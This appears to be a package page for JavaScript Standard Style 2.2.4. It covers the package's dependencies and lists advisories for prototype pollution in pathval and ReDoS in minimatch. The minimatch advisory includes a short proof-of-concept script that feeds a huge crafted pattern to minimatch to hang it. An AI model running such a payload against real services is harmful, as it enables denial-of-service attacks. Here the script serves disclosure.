Standard version 2.2.4 is a minor update to the JavaScript Standard Style package, building upon version 2.2.3. Both versions maintain the same core dependencies for linting and code style enforcement, including tools like glob, jscs, split, eslint, jshint, minimist, find-root, minimatch and run-parallel. The development dependencies also remain consistent, featuring mkdirp, rimraf, extend.js, and run-series, used for tasks like creating directories, removing files, extending objects, and running tasks in series during development.
The key difference between the two versions is their releaseDate. Version 2.2.4 was released shortly after version 2.2.3. Given the identical dependencies and devDependencies, it's likely that version 2.2.4 includes minor bug fixes, minor internal improvements, or documentation updates that didn't warrant a change in the dependency tree.
For developers using Standard, this update represents a stable and incremental improvement to the linting experience. Because the core linting tools haven't changed, upgrading from 2.2.3 to 2.2.4 should be seamless and require no changes to existing configurations or workflows. Developers can expect the same consistent code style enforcement, with potential refinements to the underlying linting process, and should update to the latest version for the most robust and reliable experience. This maintains the package's commitment to providing a simple and opinionated approach towards JavaScript code style.
All the vulnerabilities related to the version 2.2.4 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.